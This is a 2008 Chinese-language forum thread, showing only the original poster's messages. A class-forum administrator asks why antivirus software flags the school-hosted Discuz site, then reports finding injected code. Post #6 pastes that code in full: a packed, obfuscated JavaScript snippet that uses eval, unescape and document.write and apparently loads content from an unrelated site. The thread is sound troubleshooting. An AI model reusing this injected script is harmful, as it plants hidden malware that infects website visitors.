RSS   



  可打印版本 | 推薦給朋友 | 訂閱主題 | 收藏主題 | 純文字版  


 


 
主題: [求助] [已解決]申請的論壇伺服器有木馬?   字型大小:||| 
GPLynn
鐵驢友〔初級〕
等級: 4
流浪藥師

 . 積分: 29
 . 文章: 127
 . 收花: 124 支
 . 送花: 71 支
 . 比例: 0.57
 . 在線: 913 小時
 . 瀏覽: 6830 頁
 . 註冊: 7226
 . 失蹤: 124
#1 : 2008-12-5 08:27 PM     全部回覆 引言回覆

請教一下,我跟我們學校申請了一個空間以做為放置小型班級論壇之用。
但是在架設完之後,使用時防毒軟體卻會出現如下的警告。

不只我的KIS,其它同學的小紅傘等各知名防毒軟體都有類似情況。
但是我將論壇所有檔案下載回來掃毒卻又沒有其它發現。
另外,防毒軟體上出現的那個網址也不曉得哪來的,跟我們班級論壇毫無關係。
值得注意的是,這種情況不是一直發生,有時候會一直頻繁出現,有時候又完全沒反應。
是伺服器遭人入侵嗎?我有什麼方法可以防堵呢?還是只能請求校方資訊處加強防護的等級呢?

[GPLynn 在  2008-12-7 01:49 AM 作了最後編輯]



[如果你喜歡本文章,就按本文章之鮮花~送花給作者吧,你的支持就是別人的動力來源]
本文連接  
檢閱個人資料  訪問主頁  發私人訊息  Blog  快速回覆 新增/修改 爬文標記
GPLynn
鐵驢友〔初級〕
等級: 4
流浪藥師

 . 積分: 29
 . 文章: 127
 . 收花: 124 支
 . 送花: 71 支
 . 比例: 0.57
 . 在線: 913 小時
 . 瀏覽: 6830 頁
 . 註冊: 7226
 . 失蹤: 124
#2 : 2008-12-6 01:38 AM     全部回覆 引言回覆

學校資訊室提供的空間應該不會是校方植入的程式碼吧?
有沒有可能是學校的伺服被Hack所導致?
我有方法可以去防堵嗎?
我也不曉得怎麼去檢查空間,最多就是把裡面的檔案全部抓下來掃毒,但是試過了,沒有異狀。



[如果你喜歡本文章,就按本文章之鮮花~送花給作者吧,你的支持就是別人的動力來源]
本文連接  
檢閱個人資料  訪問主頁  發私人訊息  Blog  快速回覆 新增/修改 爬文標記
GPLynn
鐵驢友〔初級〕
等級: 4
流浪藥師

 . 積分: 29
 . 文章: 127
 . 收花: 124 支
 . 送花: 71 支
 . 比例: 0.57
 . 在線: 913 小時
 . 瀏覽: 6830 頁
 . 註冊: 7226
 . 失蹤: 124
#3 : 2008-12-6 04:01 AM     全部回覆 引言回覆

最令我疑惑的是...
http://www.laa.org.tw/
這個網址跟我的班網的網址是八竿子打不著丫~也不曉得是load到哪個檔導過去那個網址的。
不過現在學校的那個伺服器掛點中~也沒辦法試~
而且防毒軟體的警告也不是每次都有,在某個時間區段瀏覽時就刷一次畫面出現一次。
在其它的時間區段就一點反應都沒有,感覺就像是有人在搞鬼時才會出問題。



[如果你喜歡本文章,就按本文章之鮮花~送花給作者吧,你的支持就是別人的動力來源]
本文連接  
檢閱個人資料  訪問主頁  發私人訊息  Blog  快速回覆 新增/修改 爬文標記
GPLynn
鐵驢友〔初級〕
等級: 4
流浪藥師

 . 積分: 29
 . 文章: 127
 . 收花: 124 支
 . 送花: 71 支
 . 比例: 0.57
 . 在線: 913 小時
 . 瀏覽: 6830 頁
 . 註冊: 7226
 . 失蹤: 124
#4 : 2008-12-6 10:43 AM     全部回覆 引言回覆

班網的網址我pm給您了!
另外,學校的主機從昨晚就掛點了!實在一整個不穩。
我可能會另外找個空間來放論壇吧!學校的空間就當備用的。



[如果你喜歡本文章,就按本文章之鮮花~送花給作者吧,你的支持就是別人的動力來源]
本文連接  
檢閱個人資料  訪問主頁  發私人訊息  Blog  快速回覆 新增/修改 爬文標記
GPLynn
鐵驢友〔初級〕
等級: 4
流浪藥師

 . 積分: 29
 . 文章: 127
 . 收花: 124 支
 . 送花: 71 支
 . 比例: 0.57
 . 在線: 913 小時
 . 瀏覽: 6830 頁
 . 註冊: 7226
 . 失蹤: 124
#5 : 2008-12-6 08:01 PM     全部回覆 引言回覆

架設的人不是我,我是這兩天代管,不過下學期就換我要管理了~
那要怎麼檢查論壇原始碼呢?一個一個檢查php的內容嗎?
我有將檔案抓下來,利用搜尋"檔案裡的字或片語"來查找"www.laa.org.tw",可是沒有發現。
我寒假的時候大概會把Discuz換掉,它有太多的功能我們都用不到,似乎不太好掌控。
能推薦個適合的軟體嗎?
phpbb好像還不錯?!



[如果你喜歡本文章,就按本文章之鮮花~送花給作者吧,你的支持就是別人的動力來源]
本文連接  
檢閱個人資料  訪問主頁  發私人訊息  Blog  快速回覆 新增/修改 爬文標記
GPLynn
鐵驢友〔初級〕
等級: 4
流浪藥師

 . 積分: 29
 . 文章: 127
 . 收花: 124 支
 . 送花: 71 支
 . 比例: 0.57
 . 在線: 913 小時
 . 瀏覽: 6830 頁
 . 註冊: 7226
 . 失蹤: 124
#6 : 2008-12-6 10:51 PM     全部回覆 引言回覆

有耶~
我用emeditor跟關鍵字c.toString去找,有找到一堆檔案,之後該怎麼處理呢?
我又另外去下載了原始未安裝的檔案,但是在相對應的目錄裡似乎沒有那些檔。
可以問一下c.toString大概是什麼意思呢?
因為還是找不到有www.laa.org.tw的相關內容。

另外,有c.toString的命令列都是下面這個樣子,是只要刪除這個字串後再上傳回去就可以了嗎?

eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('k(l("m.n%o.p%q%0%f%6%g%7%2%8%r%6%s%9%1%3%4%4%a%t%5%5%b%0%c%c%d%7%0%e%2%d%e%u%5%0%e%b%2%v%d%a%3%a%1%8%w%0%b%4%3%9%1%h%1%8%3%2%0%c%3%4%9%1%h%1%i%x%5%0%f%6%g%7%2%i%j%j%y"));',35,35,'2C105|2C34|2C101|2C104|2C116|2C47|2C114|2C109|2C32|2C61|2C112|2C100|2C103|2C46|2C110|2C102|2C97|2C48|2C62|29|eval|unescape|document|write|28String|fromCharCode|2860|2C115|2C99|2C58|2C117|2C120|2C119|2C60|3B'.split('|'),0,{}))</script>



[如果你喜歡本文章,就按本文章之鮮花~送花給作者吧,你的支持就是別人的動力來源]
本文連接  
檢閱個人資料  訪問主頁  發私人訊息  Blog  快速回覆 新增/修改 爬文標記
GPLynn
鐵驢友〔初級〕
等級: 4
流浪藥師

 . 積分: 29
 . 文章: 127
 . 收花: 124 支
 . 送花: 71 支
 . 比例: 0.57
 . 在線: 913 小時
 . 瀏覽: 6830 頁
 . 註冊: 7226
 . 失蹤: 124
#7 : 2008-12-7 01:51 AM     全部回覆 引言回覆

您真是高深莫測,真是內行丫!
目前班網似乎運作正常了!
www.laa.org.tw那邊等等我就寫信去通知他們。
真的是十分感謝您的協助!



[如果你喜歡本文章,就按本文章之鮮花~送花給作者吧,你的支持就是別人的動力來源]
本文連接  
檢閱個人資料  訪問主頁  發私人訊息  Blog  快速回覆 新增/修改 爬文標記

   

快速回覆
表情符號

更多 Smilies

字型大小 : |||      [完成後可按 Ctrl+Enter 發佈]        

溫馨提示:本區開放遊客瀏覽。
選項:
關閉 URL 識別    關閉 表情符號    關閉 Discuz! 代碼    使用個人簽名    接收新回覆信件通知
發表時自動複製內容   [立即複製] (IE only)


 



所在時區為 GMT+8, 現在時間是 2024-11-26 02:26 PM
清除 Cookies - 連絡我們 - TWed2k © 2001-2046 - 純文字版 - 說明
Discuz! 0.1 | Processed in 0.022318 second(s), 7 queries , Qzip disabled